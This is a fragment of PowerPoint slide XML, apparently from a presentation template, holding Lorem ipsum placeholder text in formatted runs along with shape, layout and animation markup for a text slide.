              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ante id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>imperdiet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rutrum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>condimentum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pharetra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>blandit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sem.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rounded Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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4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4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4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10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect" nodePh="1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6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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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603251" y="1406998"/>
            <a:ext cx="10972800" cy="4912524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95057" tIns="47529" rIns="95057" bIns="47529" numCol="3" spcCol="280728"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="just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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sodales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> nisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec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 non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vivamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>risus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bibendum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>posuere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>maximus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
